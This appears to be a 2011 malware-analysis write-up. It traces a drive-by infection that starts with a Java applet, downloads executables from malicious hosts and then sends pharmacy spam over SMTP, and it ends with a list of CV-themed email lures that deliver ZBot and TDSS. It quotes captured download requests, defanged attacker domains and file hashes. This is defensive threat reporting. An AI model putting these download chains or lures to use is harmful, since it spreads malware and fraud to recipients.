Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc

Now there is a try to download a java applet:

<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>

New network traffic:

GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
 
MZ.............

Is downloaded the executable file setup.exe:

Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 on 9 (0%)

Another executable file is downloaded:

GET /client1.exe HTTP/1.0
Host: tamarer. com
 
HTTP/1.1 200 
Server: Apache
Content-Length: 650240
Content-Type: 
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges:bytes
 
MZ.................

Files created during the infection:

c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys

Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 on 9 (0%)

Other curious network traffic:

GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5

Now the malware try to send spam messages:

220 Comendo Mailfence V3
 
HELO XXX
 
250 ec3-node2.net.comendo.com says HELO to XXX:53746
 
MAIL FROM:<xxx@alcatel-lucent.com>
 
250 MAIL FROM accepted
 
RCPT TO:<xxx@lpmail.com>
 
250 RCPT TO accepted
 
DATA
 
354 continue.  finished with "\r\n.\r\n"
 
[...]
 
Subject: Bring extra pleasance to your xxx-life!
 
[...]
 
FDA-approved blue-blu-colored med to heal ED! 
hxxp://healthcontrol. dk/jhkop806.html
 
[...]

So the spam message contains a http link:

healthcontrol. dk/jhkop806.html

That redirects to:

pillrxdrugstorechains. at

URLVoid domains analysis:

http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at

Browsers Exploits Delivered as HTML Attachment

We have logged more than 300 email messages with attached various HTML files containing obfuscated javascript code that is used to redirect the users to download malicious executable files that install the ZBot banking trojan. We also noticed that some HTML files have redirected us to external urls containing web browsers exploit kits with the intent to exploit few IE, FF, PDF and Java vulnerabilities, in order to install TDSS rootkit in our system.

Example message:

Image

Example message:

Image

Example message:

Image

Most used email subjects are:

Please find my CV and cover letter attached.
Attached please find.
Enclosed please find.
Please find enclosed.
Please find CV enclosed.
The resume document is attached.
Enclosed is my CV for your consideration. Thanks
Resume.
My resume Pls.
Read my CV letter attached.
CV ready for you.
Important CV here.
Please take a look at the attached resume.
I have attached the resume.
616-13 like Important Information
Changelog 09.2010
Welcome Letter
Offer on Killington
Here’s that file that you wanted.
Attached file please find.
Please review the attached resume.